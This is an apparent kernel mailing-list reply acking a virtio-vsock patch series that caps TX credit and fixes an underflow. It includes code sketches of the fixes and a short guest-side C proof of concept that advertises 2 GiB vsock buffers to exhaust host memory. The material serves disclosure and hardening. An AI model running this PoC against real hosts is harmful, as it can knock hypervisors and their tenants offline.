On Wed, Jan 21, 2026 at 10:36:24AM +0100, Stefano Garzarella wrote:
> The original series was posted by Melbin K Mathew <[email protected]> up to v4.
> Since it fixes a real issue and the original author seems busy, I'm sending
> a new version that addresses my review comments while keeping the original
> authorship (and restoring mine on patch 2, as noted in v4).


Acked-by: Michael S. Tsirkin <[email protected]>

> v6:
> - Rebased on the net tree since patch 4 conflicted with another test
>   added there.
> - No code changes.
> 
> v5: https://lore.kernel.org/netdev/[email protected]/
> v4: https://lore.kernel.org/netdev/[email protected]/
> 
> From Melbin K Mathew <[email protected]>:
> 
> This series fixes TX credit handling in virtio-vsock:
> 
> Patch 1: Fix potential underflow in get_credit() using s64 arithmetic
>          (see the sketch just after this list)
> Patch 2: Fix vsock_test seqpacket bounds test
> Patch 3: Cap TX credit to local buffer size (security hardening)
> Patch 4: Add stream TX credit bounds regression test
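
To make the first fix concrete, here is a rough sketch of the idea behind
patch 1 (my paraphrase of a fixed virtio_transport_get_credit(), not the
actual hunk; field names follow struct virtio_vsock_sock):

	u32 virtio_transport_get_credit(struct virtio_vsock_sock *vvs,
					u32 credit)
	{
		s64 bytes;
		u32 ret;

		if (!credit)
			return 0;

		spin_lock_bh(&vvs->tx_lock);
		/* In u32 arithmetic, peer_buf_alloc - (tx_cnt - fwd_cnt)
		 * wraps to a huge value if the peer shrinks buf_alloc
		 * below the bytes already in flight; doing the math in
		 * s64 and clamping at zero avoids the underflow.
		 */
		bytes = (s64)vvs->peer_buf_alloc -
			(s64)(vvs->tx_cnt - vvs->fwd_cnt);
		if (bytes < 0)
			bytes = 0;
		ret = min_t(u32, bytes, credit);
		vvs->tx_cnt += ret;
		spin_unlock_bh(&vvs->tx_lock);

		return ret;
	}
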
> 
> The core issue is that a malicious guest can advertise a huge buffer
> size via SO_VM_SOCKETS_BUFFER_SIZE, causing the host to allocate
> excessive sk_buff memory when sending data to that guest.
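
And the gist of patch 3, as I read it (again a sketch, not the actual
hunk): when the peer advertises buf_alloc, clamp it to our own configured
buffer before granting credit against it, e.g. where the header is parsed
in virtio_transport_space_update():

	/* Never trust more peer credit than our local buffer size, so a
	 * guest advertising e.g. 2 GiB cannot make the host queue that
	 * much skb memory per connection.
	 */
	vvs->peer_buf_alloc = min_t(u32, le32_to_cpu(hdr->buf_alloc),
				    vvs->buf_alloc);
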
> 
> On an unpatched Ubuntu 22.04 host (~64 GiB RAM), running a PoC with
> 32 guest vsock connections advertising 2 GiB each and reading slowly
> drove Slab/SUnreclaim from ~0.5 GiB to ~57 GiB; the system only
> recovered after killing the QEMU process.
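
For reference, the guest side of such a PoC can be as small as the
following skeleton (hypothetical: the port number and read cadence are
made up, only the two setsockopt() calls matter):

	#include <unistd.h>
	#include <sys/socket.h>
	#include <linux/vm_sockets.h>

	int main(void)
	{
		struct sockaddr_vm addr = {
			.svm_family = AF_VSOCK,
			.svm_cid = VMADDR_CID_HOST,
			.svm_port = 1234,	/* made-up port */
		};
		unsigned long long size = 2ULL << 30;	/* 2 GiB */
		char buf[64];
		int fd;

		fd = socket(AF_VSOCK, SOCK_STREAM, 0);
		/* Raise the cap first, then advertise a huge buffer. */
		setsockopt(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE,
			   &size, sizeof(size));
		setsockopt(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
			   &size, sizeof(size));
		connect(fd, (struct sockaddr *)&addr, sizeof(addr));

		/* Read slowly so the host keeps skbs queued. */
		while (read(fd, buf, sizeof(buf)) > 0)
			sleep(1);

		close(fd);
		return 0;
	}
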
> 
> With this series applied, the same PoC shows only ~35 MiB increase in
> Slab/SUnreclaim, no host OOM, and the guest remains responsive.
> 
> Melbin K Mathew (3):
>   vsock/virtio: fix potential underflow in virtio_transport_get_credit()
>   vsock/virtio: cap TX credit to local buffer size
>   vsock/test: add stream TX credit bounds test
> 
> Stefano Garzarella (1):
>   vsock/test: fix seqpacket message bounds test
> 
>  net/vmw_vsock/virtio_transport_common.c |  30 +++++--
>  tools/testing/vsock/vsock_test.c        | 112 ++++++++++++++++++++++++
>  2 files changed, 133 insertions(+), 9 deletions(-)
> 
> -- 
> 2.52.0

